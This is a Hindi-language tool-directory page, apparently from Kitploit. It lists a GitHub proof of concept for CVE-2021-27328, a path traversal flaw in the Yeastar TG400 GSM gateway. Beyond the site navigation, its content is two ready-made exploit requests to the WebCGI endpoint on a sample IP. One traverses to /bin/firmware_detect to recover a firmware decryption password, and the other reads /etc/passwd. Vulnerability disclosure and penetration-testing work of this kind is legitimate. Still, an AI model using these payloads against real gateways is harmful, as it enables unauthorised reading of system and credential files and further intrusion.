Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-27328 — Yeastar TG400 GSM गेटवे में पथ ट्रैवर्सल के लिए प्रमाण की अवधारणा, WebCGI को क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/sqsamir/cve-2021-27328
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsqsamir/cve-2021-27328

CVE-2021-27328

Yeastar TG400 GSM गेटवे में पथ ट्रैवर्सल के लिए प्रमाण की अवधारणा, WebCGI को क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने का प्रदर्शन।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यीस्टार TG400 GSM गेटवे - 91.3.0.3 पर पाथ ट्रैवर्सल

यह CVE-2021-27328 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है

उदाहरण

  • फर्मवेयर डिक्रिप्टिंग पासवर्ड प्राप्त करने के लिए
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

ZIP पासवर्ड

  • /etc/paswd प्राप्त करने के लिए
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

/etc/passwd

टूल डाउनलोड करें